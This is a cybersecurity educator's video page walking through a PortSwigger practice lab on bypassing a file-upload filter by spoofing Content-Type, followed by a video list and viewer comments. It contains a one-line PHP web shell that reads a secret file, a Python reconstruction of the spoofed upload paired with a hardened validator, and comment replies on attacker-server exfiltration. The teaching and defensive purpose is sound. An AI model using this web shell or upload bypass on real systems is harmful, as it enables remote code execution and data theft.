Popo Hack
Tunisia
Joined 22 Apr 2022
Helping you get into the cybersecurity field and be the best hacker. I am Nabil Popo, a Cybersecurity Researcher and Bug Bounty Hacker 🧑💻
On my channel I provide several high-quality, quick and simple tutorials on technology involving CTFs, pentesting, network scanning and more, in an easy way and in easy English for all levels, from beginners to experts.
My mission is to make education and problem-solving easy and simple for everyone. 🛸
Feel free to ask me any kind of question or ask me for help 🚀
😀 Follow me to learn more ➡️ bit.ly/3TplFRN ✅
Portswigger - File upload - Lab #2 Web shell upload via Content Type restriction bypass
Hello Hackers, in this video on web shell upload via a Content-Type restriction bypass, you will see how to discover and exploit a file upload function to get remote code execution and leak sensitive information, using Burp Suite, in a lab from the Web Security Academy powered by PortSwigger.
⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️
0:00 - About the Lab
1:10 - About the PHP documentation of filesystem functions
1:30 - Map the application
2:15 - Exploit the update-avatar function
4:44 - Discover the file server endpoint
5:28 - Write the RCE payload in PHP
7:08 - Change the Content-Type
8:17 - phpinfo() page
9:00 - Use file_get_contents()
🔍 About the Lab
Lab: Web shell upload via Content-Type restriction bypass
Level: Practitioner
This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
🔗 Resources
PHP Documentation:
www.php.net/manual/en/book.filesystem.php
Remote Code Execution (RCE) definition:
www.cloudflare.com/learning/security/what-is-remote-code-execution/
✅ What to do?
1. Log in and upload an image as your avatar, then go back to your account page.
2. In Burp, go to Proxy then HTTP history and notice that your image was fetched using a GET request to /files/avatars/YOUR-IMAGE. Send this request to Burp Repeater.
3. On your system, create a file called exploit.php containing a script that reads Carlos's secret. A complete PHP file needs the opening tag, for example:
<?php echo file_get_contents('/home/carlos/secret'); ?>
4. Attempt to upload this script as your avatar. The response indicates that you are only allowed to upload files with the MIME type image/jpeg or image/png.
5. In Burp, go back to the proxy history and find the POST /my-account/avatar request that was used to submit the file upload. Send this to Burp Repeater.
6. In Burp Repeater, go to the tab containing the POST /my-account/avatar request. In the part of the message body related to your file, change the specified Content-Type to image/jpeg.
7. Send the request. Observe that the response indicates that your file was successfully uploaded.
8. Switch to the other Repeater tab containing the GET /files/avatars/YOUR-IMAGE request. In the path, replace the name of your image file with exploit.php and send the request. Observe that Carlos's secret was returned in the response.
9. Submit the secret to solve the lab.
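The steps above are the manual workflow in Burp. The following is an added example, written for this page and not code from the lab, from PortSwigger or from the video: it reconstructs in Python both sides of what step 6 exploits. build_multipart() produces the POST /my-account/avatar body with an attacker-chosen part Content-Type (the edit you make by hand in Repeater), vulnerable_check() models the lab's flaw of trusting that client-supplied header, and hardened_check() shows what a server should do instead: ignore the header, allowlist the extension and verify the file's leading bytes against it. The form field name "avatar", the multipart boundary and the PNG stub are constructed assumptions; the web shell text and the allowed MIME types come from the lab steps.

```python
"""Content-Type restriction bypass on a file upload, modelled end to end.

Added example for this page, not the lab's or PortSwigger's code.
"""
import os
import re

# Server-side allowlists (assumption: only JPEG and PNG are accepted, as the
# lab's error message in step 4 states).
ALLOWED_MIME = {"image/jpeg", "image/png"}
EXT_TO_MIME = {".jpg": "image/jpeg", ".jpeg": "image/jpeg", ".png": "image/png"}
# Well-known file signatures a server should sniff instead of trusting a header.
MAGIC = {b"\xff\xd8\xff": "image/jpeg", b"\x89PNG\r\n\x1a\n": "image/png"}

BOUNDARY = "----WebKitFormBoundaryExample"                        # constructed
WEB_SHELL = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"  # step 3
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed: valid signature only


def build_multipart(filename, part_content_type, data, boundary=BOUNDARY):
    """Body of POST /my-account/avatar with an attacker-chosen part Content-Type.

    The field name "avatar" is an assumption. A browser labels a .php file as
    application/x-php or application/octet-stream; step 6 in Burp overwrites
    that with image/jpeg, which is what the third argument lets us do here.
    """
    crlf = b"\r\n"
    disposition = f'Content-Disposition: form-data; name="avatar"; filename="{filename}"'
    return (
        b"--" + boundary.encode() + crlf
        + disposition.encode() + crlf
        + f"Content-Type: {part_content_type}".encode() + crlf + crlf
        + data + crlf
        + b"--" + boundary.encode() + b"--" + crlf
    )


def parse_multipart(body, boundary=BOUNDARY):
    """Minimal server-side parse: first file part as filename/content_type/data."""
    delimiter = b"--" + boundary.encode()
    for raw in body.split(delimiter)[1:-1]:      # drop preamble and closing "--"
        head, _, data = raw.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]
        head_text = head.decode("latin-1")
        fn = re.search(r'filename="([^"]*)"', head_text)
        ct = re.search(r"(?im)^Content-Type:\s*([^\r\n;]+)", head_text)
        if fn:
            return {
                "filename": fn.group(1),
                "content_type": ct.group(1).strip().lower() if ct else "",
                "data": data,
            }
    return None


def vulnerable_check(part):
    """The lab's flaw: the declared MIME type is whatever the client sent."""
    return part["content_type"] in ALLOWED_MIME


def sniff_type(data):
    """Identify the real type from the leading bytes; None if not an allowed image."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def hardened_check(part):
    """Ignore the header; require an allowlisted extension whose type matches
    the sniffed content. Uploads must additionally be stored where the web
    server will not execute them, which no validator can do for you."""
    ext = os.path.splitext(part["filename"])[1].lower()
    expected = EXT_TO_MIME.get(ext)
    if expected is None:
        return False
    return sniff_type(part["data"]) == expected


if __name__ == "__main__":
    for fname, ctype, data in [
        ("avatar.png", "image/png", PNG_STUB),             # genuine upload
        ("exploit.php", "application/x-php", WEB_SHELL),   # step 4: as a browser sends it
        ("exploit.php", "image/jpeg", WEB_SHELL),          # step 6: header edited in Repeater
    ]:
        part = parse_multipart(build_multipart(fname, ctype, data))
        print(f"{fname:12} declared={ctype:18} vulnerable_accepts={vulnerable_check(part)!s:5} "
              f"hardened_accepts={hardened_check(part)}")
```

Running the block shows the spoofed exploit.php accepted by vulnerable_check() and rejected by hardened_check(), while a genuine PNG passes both. Note that even the hardened check only closes the upload filter; the lab also demonstrates that /files/avatars/ executes PHP, so the upload directory must not be served by the PHP handler (or the file must be re-encoded and renamed server-side) for the fix to be complete.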
Thank you for watching my video. If you have any questions or topic recommendations, feel free to write them in the comments below 🙋
#WebSecurityAcademy #portswigger #vulnerability
Views: 67
Videos
Portswigger - File upload - Lab #1 Remote code execution via web shell upload
153 views · a month ago
Hello Hackers, in this video of Remote code execution via web shell upload. You will see how to exploit, discover and find sensitive information based on Remote code execution to leak sensitive information from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 1:12 - About Remote Code Execution (RCE) 2:07 - Exampl...
Portswigger - Access Control - Lab #13 Referer based access control
101 views · 2 months ago
Hello Hackers, in this video of Referer based access control. You will see how to exploit, discover and find sensitive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:38 - About Referer Header 1:49 - Discover Admin account 2:45 - T...
Portswigger - Access Control - Lab #12 Multi step process with no access control on one step
55 views · 2 months ago
Hello Hackers, in this video of Multi step process with no access control on one step. You will see how to exploit, discover and find sensitive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 1:32 - Discover Admin account 2:15 - Test...
Portswigger - Access Control - Lab #11 Method based access control can be circumvented
74 views · 2 months ago
Hello Hackers, in this video of Method based access control can be circumvented. You will see how to exploit, discover and find sensitive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:40 - About HTTP request methods 1:12 - Discov...
Portswigger - Access Control - Lab #10 URL based access control can be circumvented
93 views · 3 months ago
Hello Hackers, in this video of URL based access control can be circumvented. You will see how to exploit, discover and find sensitive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:50 - What's X-Original-URL header? 2:24 - Check ...
Portswigger - Access Control - Lab #9 Insecure direct object references (IDOR)
148 views · 3 months ago
Hello Hackers, in this video of insecure direct object references (IDOR). You will see how to exploit, discover and find sensitive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:25 - What's IDOR ? 2:31 - Test live chat 3:38 - Chec...
Portswigger - Access Control - Lab #8 User ID controlled request parameter with password disclosure
96 views · 3 months ago
Hello Hackers, in this video of User ID controlled by request parameter with password disclosure. You will see how to exploit, discover and find sensitive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 1:03 - Log-in as Wiener user 1...
Portswigger - Access Control - Lab #7 User ID controlled by req params with data leakage in redirect
74 views · 4 months ago
Hello Hackers, in this video of User ID controlled by request parameter with data leakage in redirect. You will see how to exploit, discover and find sensitive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:53 - Log-in as Wiener u...
Portswigger - Access Control - Lab #6 User ID controlled by request parameter with unpredictable use
178 views · 4 months ago
Hello Hackers, in this video of User ID controlled by request parameter with unpredictable use. You will see how to exploit, discover and find sensitive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:37 - About Globally Unique Ide...
Portswigger - XSS - Lab #3 DOM XSS in document write sink using source location search
159 views · 4 months ago
Hello Hackers, in this video of DOM XSS in document write sink using source location search you will see how to exploit, discover and find sensitive information based on application Cross-Site Scripting to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:53 - Discover the blog 2:17 ...
Portswigger - XSS - Lab #2 Stored XSS into HTML context with nothing encoded
110 views · 5 months ago
Hello Hackers, in this video of Stored XSS into HTML context with nothing encoded you will see how to exploit, discover and find sensitive information based on application Cross-Site Scripting to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 1:08 - Discover the blog 1:48 - Test com...
Portswigger - XSS - Lab #1 Reflected XSS into HTML context with nothing encoded
188 views · 5 months ago
Hello Hackers, in this video of Reflected XSS into HTML context with nothing encoded you will see how to exploit, discover and find sensitive information based on application Cross-Site Scripting to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:35 - Explore Inspector and console ...
Portswigger - Access Control - Lab #5 User ID controlled by request parameter
156 views · 5 months ago
Hello Hackers, in this video of User ID controlled by request parameter you will see how to exploit, discover and find sensitive information based on application logic flow to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:29 - Explaining Escalation Methods 1:57 - Log-in as Wiener...
Portswigger - Information Disclosure - Lab #5 Information disclosure in version control history
251 views · 5 months ago
Hello Hackers, in this video of Information disclosure in version control history you will see how to exploit, discover and find sensitive information to leak for potential attacks from Burp Suite in a lab from Web Security Academy powered by Portswigger ⚠️ Subscribe to my channel ➡️ @popo_hack ⚠️ 0:00 - About the Lab 0:37 - About Git and Version Control System 2:24 - Github - Git Cheat Sheet 2:...
Portswigger - Access Control - Lab #4 User role can be modified in user profile
188 views · 6 months ago
Portswigger - Access Control - Lab #3 User role controlled by request parameter
245 views · 6 months ago
Portswigger - Access Control - Lab #2 Unprotected admin functionality with unpredictable URL
194 views · 6 months ago
Portswigger - Access Control - Lab #1 Unprotected admin functionality
2.9K views · 9 months ago
Portswigger - Business Logic - Lab #2 High level logic vulnerability
625 views · 10 months ago
Portswigger - Business Logic - Lab #1 Excessive trust in client side controls
831 views · 10 months ago
Portswigger - Information Disclosure - Lab #4 Authentication bypass via information disclosure
1.7K views · 10 months ago
Portswigger - Information Disclosure - Lab #3 Source code disclosure via backup files
971 views · 10 months ago
Portswigger - Information Disclosure - Lab #2 Information disclosure on debug page
1.2K views · 11 months ago
Portswigger - Information Disclosure - Lab #1 Information disclosure in error messages
931 views · 11 months ago
Portswigger - API Testing - Lab #5 Exploiting server side parameter pollution in a REST URL
1.3K views · 11 months ago
Portswigger - API Testing - Lab #4 Exploiting a mass assignment vulnerability
2.3K views · 11 months ago
Portswigger - API Testing - Lab #3 Finding and exploiting an unused API endpoint
3.9K views · 11 months ago
Portswigger - API Testing - Lab #2 Exploiting server side parameter pollution in a query string
4.8K views · a year ago
Portswigger - API Testing - Lab #1 Exploiting an API endpoint using documentation
8K views · a year ago
Very useful!
Thank you 😇
I got this, please help:
"GET /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22 HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
10.0.4.28 2024-12-16 07:17:21 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
39.56.209.123 2024-12-16 07:17:22 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
39.56.209.123 2024-12-16 07:17:22 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
39.56.209.123 2024-12-16 07:17:25 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
let me let me let me let me aaaaaaaaaaaaa😡😡😡😡
/log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22 :<
Hello my friend, what's the problem exactly?
same problem, if yours work please reply
@popo_hack 'Resource not found' instead of key
same for me
try putting before any url you're using
Can you *please* pronounce the terminology correctly and not confuse the green hats who have to watch this video from Port Swigger's site? You are especially confusing the green hats whose native language is not English. Interceptor not introspector. It is extremely frustrating to know that some people who are considered experts, are getting the terminology wrong. If you are going to be an educator, know your discipline.
Hello my friend 😊 Thank you for pointing this out. English is my third language, and I understand that I may make mistakes. I’ll work on improving my pronunciation and terminology in future videos. I appreciate your feedback! Happy hack ^^
Are InQL scanner, timer and attacker extensions?
InQL is an extension provided by the PortSwigger community, but I am not sure I understand your question about Timer and Attacker. You can check the list of all extensions supported by Burp Suite: portswigger.net/bappstore
I'm trying to complete this lab and I haven't been able to do it for 2 hours. I'm doing exactly as you did, but in the access log it shows me the API key of this wiener user instead of administrator. Maybe you have any idea what the reason for this is?
Hello my friend 😊 Please check how I wrote the code in the video, then copy it, go to the Exploit Server > paste your code > Save > Deliver to victim. If this doesn't work for you, you might close the lab and re-do it after a while. I hope this can help you. Happy Hack ^^
@popo_hack Hi! Thank you for the response. But I did it exactly as you told me, several times. And it still doesn't work as expected :(
After a few more retries it finally worked, thank you!
@mykhailodudka5324 That's too bad. You might try to log out as the wiener user and re-do it again. If this solution doesn't work for you, this is maybe a bug in the Web Security Academy; you can report it to them so they check the problem with you. I hope you find a way my friend
@mykhailodudka5324 Ooo great news 🤗 happy for you my friend 😁 Best of luck in your learning journey
Thank you my friend, you are awesome
Welcome my friend 😊 thank you so much, I really appreciate it 😇 Happy hack ^^
Thank God.. Now I got it👍
Happy for you my friend 😄 If you like this kind of content, don't forget to subscribe to my channel to be up to date with new videos 😁 Happy hack ^^
This lab was really difficult 😢
Hello my friend 😊 Yes, this lab is a little bit harder than the others. Best of luck. If you're interested in this kind of video, don't forget to subscribe to my channel to be up to date with new videos
🔥
Always the first in comment 😁
nice job
Thank you so much my friend 😊 I really appreciate your words. If you want to see more videos like this one, please don't forget to subscribe to my channel to be up to date with new videos 😇
Hello, Popo. Do you have a video doing IDOR in a real environment?
Hello friend again 😊 Actually, I don't do that kind of video; they're not legal to share. If you do an IDOR it should always be for ethical reasons. You can read some write-ups about it where ethical hackers share their findings on Hackerone.com
Hello my new friends don't forget to follow me on my channel to keep you up to date about everything you need to know to exploit vulnerabilities bit.ly/3TplFRN
How can I see the access log in a real bug after transferring it via Burp Suite?
Hello my friend 😁 In real life you might build your own server hosted on the cloud. You might use NodeJS, Laravel, Django or any backend server to build it. So here we have a server provided by Web Security Academy for testing. If you like this kind of video, please don't forget to subscribe to my channel to be up to date with new videos 😁 Happy hack ^^
Many thanks for your reply, I do now
@acceshopping7360 Absolutely welcome my friend 😊 ask me at any time. Happy hack ^^
I have a friend who is a hacker, and I'm without money but I like cybersecurity. So he told me to study IDOR at Portswigger, which has so much bug bounty IDOR, because hackers dislike it since it has no automation. So he said: if you learn IDOR, you get 800 USD per month or more. Is it possible, every month?
Hello, my friend 😊 Actually, IDOR is one of the most famous bugs on the internet, but to find one, you need to practice more in different scenarios. It's possible to find a bug like IDOR, but it's not that easy; you might learn about other types of bugs along the way. Best of luck in your hacking journey! I hope you succeed. Happy hack ^^
Thank you for taking the time to walk us through this. I learned more here than in my college!
Hello my friend 😁 I'm happy to hear that from you. I hope you learn more from my videos. I do my best to provide an easy way to teach 😊 Don't forget to subscribe to my channel to be up to date with new videos. Happy hack ^^
Great content. I had to look at the solution for this lab and thought I would never think of that, but you've laid it out clearly with logical steps and now I can see why someone would follow the solution steps. Subscribed :)
Hello my friend 😊 I really appreciate your words 😇 I am happy that you liked my content and the way I teach. I try to make cybersecurity easy for everyone, and thank you for your comment and your subscription 😁 Happy hack ^^
Congratulations 👏 on 1K subs
Thank you my friend 😁
Yooo ❤ mate is back. I'm in the office right now and will watch it as soon as I get time. Love the new series on file uploads
Happy to see you my friend 🌸
Why didn't the price change when you added the item_price at 4:34?
Hello my friend 😄 Can you be more specific? Which price changed? Do you mean the Total Price or the Item Price? If your answer is 'Total Price', the Total Price changed because we injected the chosen_discount to get a 100% discount and take the item for free. If your answer is 'Item Price', it might change but it has no impact on the final purchase because there's a backend check of the item price. If you liked the content, feel free to subscribe to the channel for more videos like this. Your support means a lot! 😁
@popo_hack yeah, already subscribed 😌. Thank you for clearing my doubt
You're welcome my friend 😊 Feel free to ask me any question you want. Happy hack ^^
Nice vid. Liked the way you tried to work towards a solution realistically and broke down / explained your thought process and the items you were inspecting
Thank you so much for the kind comment! I’m glad you enjoyed the breakdown and explanations. If you liked the content, feel free to subscribe to the channel for more videos like this. Your support means a lot! 😇
Needed to install a newer java runtime following this, but useful info nonetheless
Happy to hear that my friend 😊
Very nicely explained <3 but bro, in real life how do you get to this point? It would be a very frustrating task I guess
Hello my friend 😊 Thank you for your comment. Actually in real life this will be different; the purpose of this video is to merge more types of attacks into one. It lets you think in a different way to find bugs the development team might have missed. So my friend, please don't forget to subscribe to my channel to be up to date with new videos 😁 Happy Hack ^^
Great work as always :) so what's next, authentication, or do you have plans to complete your other playlists?
Hello my friend 😊 Happy to see you. My next series will be File Upload Vulnerabilities 😁 I will do Authentication after that 😁
@popo_hack looking forward to it 🧨🥳
I really appreciate your words 🙏
😭😭😭 Finally! As an ADHD learner I approve this vid 😭😭😭🎀
Hello my friend 😇 Happy to hear that, best of luck in your learning journey 😊 Please don't forget to subscribe to my channel to be up to date with new videos. Happy Hack ^^
There is no need to change the CSRF token and session ID; simply log in using the given credentials and change the id name wiener to carlos ❤❤
Can we say it is a kind of IDOR? In IDOR we change the user ID but here we change the name, but the exploitation is the same and the cause of occurrence is also the same: in IDOR the backend doesn't validate the session against the ID, it simply gives the output depending on the user-supplied info
Hello my friend 😇 You're right, it is a kind of IDOR vulnerability where you can read or write specific data. I talked more about this topic in the next video; you can watch it here: th-cam.com/video/QPVKbjyIOeE/w-d-xo.html So my friend, if you like these kinds of videos please don't forget to subscribe to my channel to be up to date with new videos 😁 Happy Hack ^^
@popo_hack Love your content bro. I am just revising the concept and found your video very short, precise and informative
Thank you so much! I'm glad you found the video helpful and precise. If you have any questions, feel free to let me know! 😊
I hope I get a response though. I'm getting an error message while using wget -r and the URL. It's saying unable to resolve host address. Any suggestions on how I can fix that? Thanks.
Hello my friend 😊 Can you please provide me more details? What is the error message? And what is the full command that you used? In the meantime you can check that the Linux wget command with the /git endpoint looks like: wget -r example.com/git And if you get an error related to certificates you can add the --no-check-certificate flag, like: wget -r --no-check-certificate example.com/git I am waiting for you to provide me with more details so I can help you. Happy hack ^^
Awesome. Thanks for your job.
Welcome my friend 😊 happy to hear that 🌸 Don't forget to watch the full series my friend, I will upload the last lab next week, stay tuned 😇
I'm always the first to be here :)
Hello my friend 😁 You're so fast my friend hhh Thank you for your motivation, happy to see you every time I upload a new video
@popo_hack :) your videos remind me to complete more labs haha and I really love your energy 😁
@Aquax1000 hhh thank you my man 😁 I really like your comments too, you make my day as always 🙏😇
Thanks for uploading this Popo :) I've nowadays shifted to manual testing and I must say it does require a lot of understanding of the application on real-world targets.
Hello my friend 🤗 Happy to have you back again! Best of luck in your journey
@popo_hack Thanks Popo, I will let you know as soon as I find something interesting. Btw I'm mixing up Access Control, logic errors and Auth together, but nowadays I'm having a really hard time with GraphQL as this is really something new for me
Good job my friend, you're doing a great job. GraphQL is a part of API Testing; you can see both of my series on my channel, they might help you 😊
{ "errors": [ { "path": [ "changeEmail" ], "extensions": { "message": "You must be logged in to change email" }, "locations": [ { "line": 1, "column": 50 } ], "message": "Exception while fetching data (/changeEmail) : You must be logged in to change email" } ], "data": { "changeEmail": null } } My code doesn't work, help me, great Popo Hack, please
Hello my friend 😇 This error means that you were not logged in when you tested your code. Please check your code against the video. And try to test it on your own account first: if you are able to change your own email it means your code works fine; if not, double-check it and rewrite it again. If you don't have knowledge of programming in JavaScript you might have some difficulty.
So within the script where we are calling the host with the subdomain, why do we need to use http instead of https?
Hello my friend again. We use 'http' instead of 'https' in the example because the server and the lab of Web Security Academy are hosted on the same host, where they communicate with each other via the LOCALHOST domain (127.0.0.1), but in a real-life scenario, if you have your own server hosted on the cloud, you will need to use 'https' 🤓
and also, I really like how you explain those steps exploiting each of the portswigger challenges
Thank you so much my friend, I really appreciate your words and that you like my content. Please don't forget to subscribe to my channel to be up to date with new videos 😁
Can I ask a question? When attempting to exploit this vulnerability, do we need to include the attacker's server URL (that contains the request file) in the Origin header of the request? Additionally, does the admin user need to click that endpoint for it to access the attacker's server?
Hello my friend 😇 Thank you for your comment. 1. Yes, in a real-life situation the attacker includes his server address to receive the requests and reads his server's log to get the request data. 2. Yes, the admin user (privileged user) has to click the link to send the request to the attacker's server. These 2 things can only happen when the application has a CORS vulnerability where it leaks headers and sensitive data
Can you tell me where I can study for the OWASP Top 10 web and mobile and where I can practice it? Because the OWASP topic names are not clear names to just search for and find labs to practice. There are some clear names like Broken Access Control and Injection, but for the others I couldn't find where to study and practice them, and the Top 10 mobile as well. If you make a video about that it would be awesome, thanks ❤❤
Hello my friend 😇 First, thank you for your comment and your suggestion, I really appreciate these kinds of ideas. The best places where you can learn more about front-end vulnerabilities, back-end vulnerabilities and many other topics are these websites: 1. Web Security Academy: portswigger.net/web-security/all-topics => this website is the same one in my videos 2. TryHackMe: tryhackme.com/ => this website has more topics in Network, Mobile, OS and more 3. HackTheBox: www.hackthebox.com/ => this website is very popular for practising your skills. I hope that I answered your question my friend, please don't forget to subscribe to my channel to be up to date with new videos 😊
Thanks Popo, your videos are awesome ❤ plz don't stop, keep it up. I found you in the Portswigger community solutions and I'm very happy 😊
Hello friend 😊 I am very happy with those words 🙏 I am doing my best to upload a new video every week, stay tuned for new videos 😊
I was surprised when you successfully sent a JSON body in a GET :)
Hello my friend 😁 You can send a body in a GET request with GraphQL, but it is not recommended because GET requests are typically expected to be idempotent and use query parameters. However, some servers may allow it for convenience, though it goes against HTTP standards.
nice! thank you
Welcome my friend 😇 I am happy that you like my video. Don't forget to subscribe to my channel to be up to date for new videos 😀
What's the password, buddy? 'killer' doesn't work for me
@настоящийтурбовася Hello my friend 😇 I translated your comment and now I can answer your question of 'why didn't killer work as the password': this is because the password changes each time you run the lab, so you need to write your own script as I did in the video to find the right password 😁 I hope that I answered your question my friend, please don't forget to subscribe to my channel to be up to date with new videos 😊
@popo_hack hello my dear friend, thank you bro
thank you!
Welcome my friend 😇🙏
I am getting a lot of 'noise' in my WebSockets history, namely ping and pong messages. Do you know if there is any way to stop these messages from bouncing back and forth please? I notice that you don't get them!
Hello my friend 😇 thank you for your comment. If you get any extra messages from your browser, you may have received those messages from another server, so maybe it comes from one of your extensions. Try to clear your browser data and remove extra extensions that you don't need, then try again and check 😄 I hope that answered your question, so if you like this kind of video don't forget to subscribe to my channel to be up to date with new videos 😁 Happy hack ^^
It's cool bro, loved it. I am doing more to hunt more
Happy to hear that my friend, I hope you learn more from my videos. Don't forget to subscribe to be up to date with new videos 😇
@popo_hack Done bro. Can you make more videos on OS command injection dude? I try at forms but didn't get it, and I saw different reports where they are doing it in unique ways. I am doing it bro, but can I request it?
Hello my friend again 😁 Thank you for your suggestion. Actually I will do an OS Command Injection series after finishing my plan of videos, and this can take some time, so you can search on TH-cam about this topic and you will find hundreds of videos talking about it that can help you learn more 😇
@popo_hack Thanks bro, yeah I have done all the things, even watched Rana Khalil's videos. I love to learn from various guys, so that's why 🤗
You're welcome 😇
Great!!
Thank you so much my friend 😇 I hope that you learned something from my video. Don't forget to watch the full GraphQL series to learn more 😊 Please don't forget to like the video and subscribe to my channel to be up to date with new videos 🌸
Again First :) ❤
Happy to see you my friend 🤩